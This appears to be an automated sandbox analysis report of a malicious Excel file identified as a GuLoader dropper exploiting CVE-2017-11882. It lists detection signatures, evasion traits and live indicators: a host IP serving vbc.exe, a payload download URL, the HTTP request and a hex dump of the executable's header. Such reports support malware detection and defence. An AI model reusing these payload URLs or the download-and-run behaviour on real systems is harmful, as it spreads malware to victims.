Windows Analysis Report #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Overview

General Information

Sample Name:	#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
Analysis ID:	483661
MD5:	4a1d13469a6c817242e8b567bf34ab9a
SHA1:	a0d54f6c1205defad5f31cadf3393880e7c4c862
SHA256:	65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
Tags:	LokiVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}

Multi AV Scanner detection for submitted file

Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	Virustotal: Detection: 38%			Perma Link
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	ReversingLabs: Detection: 28%

Antivirus detection for URL or domain

Source: http://23.95.85.181/0789/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://23.95.85.181/0789/vbc.exe

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 20%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 70MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1pn-b6M_RemB

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:06:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Wed, 15 Sep 2021 06:03:24 GMTETag: "1e000-5cc0274c3638e"Accept-Ranges: bytesContent-Length: 122880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00 ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00 60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00 00 d0 01 00 f6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /0789/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.85.181Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: EA784B99.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf

Jump to behavior

Source: global traffic

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the 16 g yellow bar above ,, This document is 18 3. Once you have enabled edi

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D26BE	6_2_003D26BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9AB0	6_2_003D9AB0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0EAE	6_2_003D0EAE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D1F	6_2_003D5D1F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0746	6_2_003D0746
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0E3C	6_2_003D0E3C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3C3F	6_2_003D3C3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4835	6_2_003D4835
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9437	6_2_003D9437
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5A2D	6_2_003D5A2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2E23	6_2_003D2E23
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2C0D	6_2_003D2C0D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D420F	6_2_003D420F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5E07	6_2_003D5E07
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5003	6_2_003D5003
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D847F	6_2_003D847F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D507A	6_2_003D507A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1077	6_2_003D1077
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C73	6_2_003D8C73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8464	6_2_003D8464
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4266	6_2_003D4266
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9C63	6_2_003D9C63
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3A50	6_2_003D3A50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0844	6_2_003D0844
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0847	6_2_003D0847
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D10BD	6_2_003D10BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4CB6	6_2_003D4CB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3AB1	6_2_003D3AB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D92B3	6_2_003D92B3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D20A8	6_2_003D20A8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D469F	6_2_003D469F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D149E	6_2_003D149E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D309B	6_2_003D309B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4E8F	6_2_003D4E8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46F9	6_2_003D46F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2EFB	6_2_003D2EFB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D48F4	6_2_003D48F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46DE	6_2_003D46DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9ADB	6_2_003D9ADB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D62C5	6_2_003D62C5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8EC2	6_2_003D8EC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4B39	6_2_003D4B39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D493B	6_2_003D493B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9B3B	6_2_003D9B3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4523	6_2_003D4523
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D491A	6_2_003D491A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4512	6_2_003D4512
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2B0C	6_2_003D2B0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3F06	6_2_003D3F06
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1303	6_2_003D1303
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0973	6_2_003D0973
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D73	6_2_003D4D73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D175B	6_2_003D175B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0F57	6_2_003D0F57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D49BB	6_2_003D49BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9DB7	6_2_003D9DB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8FB1	6_2_003D8FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D39AB	6_2_003D39AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4DAB	6_2_003D4DAB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D59A3	6_2_003D59A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D879B	6_2_003D879B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D95	6_2_003D4D95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2F96	6_2_003D2F96
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8D8F	6_2_003D8D8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D89	6_2_003D4D89
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D81	6_2_003D5D81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3383	6_2_003D3383
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D7FFF	6_2_003D7FFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D51F3	6_2_003D51F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0DDF	6_2_003D0DDF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D85DA	6_2_003D85DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D61CD	6_2_003D61CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D11C7	6_2_003D11C7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2DC7	6_2_003D2DC7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CD5	9_2_001B5CD5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B421B	9_2_001B421B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2E13	9_2_001B2E13
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4208	9_2_001B4208
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5003	9_2_001B5003
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5E07	9_2_001B5E07
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9437	9_2_001B9437
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4835	9_2_001B4835
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5A2D	9_2_001B5A2D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B507A	9_2_001B507A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8C73	9_2_001B8C73
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2E64	9_2_001B2E64
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B469F	9_2_001B469F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9C8B	9_2_001B9C8B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E8F	9_2_001B4E8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B92B3	9_2_001B92B3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9AB0	9_2_001B9AB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CB6	9_2_001B4CB6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B18AA	9_2_001B18AA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3AA5	9_2_001B3AA5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9ADB	9_2_001B9ADB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8EC2	9_2_001B8EC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9B3B	9_2_001B9B3B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4B39	9_2_001B4B39
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4933	9_2_001B4933
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D30	9_2_001B5D30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4523	9_2_001B4523
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9F	9_2_001B8F9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4D95	9_2_001B4D95
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8D8F	9_2_001B8D8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D81	9_2_001B5D81
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8FB1	9_2_001B8FB1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9DB7	9_2_001B9DB7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4DAB	9_2_001B4DAB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BAC	9_2_001B8BAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B59A3	9_2_001B59A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3DA1	9_2_001B3DA1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA0	9_2_001B7DA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7FFF	9_2_001B7FFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BFF	9_2_001B8BFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B49EB	9_2_001B49EB

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D26BE NtWriteVirtualMemory,	6_2_003D26BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0EAE CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	6_2_003D0EAE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D1F NtWriteVirtualMemory,NtAllocateVirtualMemory,	6_2_003D5D1F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D958B NtProtectVirtualMemory,	6_2_003D958B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4835 NtWriteVirtualMemory,	6_2_003D4835
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D960D NtProtectVirtualMemory,	6_2_003D960D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F NtWriteVirtualMemory,	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5E07 NtAllocateVirtualMemory,	6_2_003D5E07
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5003 NtWriteVirtualMemory,	6_2_003D5003
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D507A NtWriteVirtualMemory,	6_2_003D507A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4266 NtWriteVirtualMemory,	6_2_003D4266
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4CB6 NtWriteVirtualMemory,	6_2_003D4CB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D469F NtWriteVirtualMemory,	6_2_003D469F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4E8F NtWriteVirtualMemory,	6_2_003D4E8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46F9 NtWriteVirtualMemory,	6_2_003D46F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D48F4 NtWriteVirtualMemory,	6_2_003D48F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46DE NtWriteVirtualMemory,	6_2_003D46DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4B39 NtWriteVirtualMemory,	6_2_003D4B39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D493B NtWriteVirtualMemory,	6_2_003D493B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4523 NtWriteVirtualMemory,	6_2_003D4523
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D491A NtWriteVirtualMemory,	6_2_003D491A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D73 NtWriteVirtualMemory,	6_2_003D4D73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D49BB NtWriteVirtualMemory,	6_2_003D49BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4DAB NtWriteVirtualMemory,	6_2_003D4DAB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D95 NtWriteVirtualMemory,	6_2_003D4D95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D89 NtWriteVirtualMemory,	6_2_003D4D89
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D81 NtAllocateVirtualMemory,	6_2_003D5D81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D51F3 NtWriteVirtualMemory,	6_2_003D51F3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CD5 NtAllocateVirtualMemory,	9_2_001B5CD5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5E07 NtAllocateVirtualMemory,	9_2_001B5E07
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D30 NtAllocateVirtualMemory,	9_2_001B5D30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D81 NtAllocateVirtualMemory,	9_2_001B5D81

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	Virustotal: Detection: 38%
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	ReversingLabs: Detection: 28%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

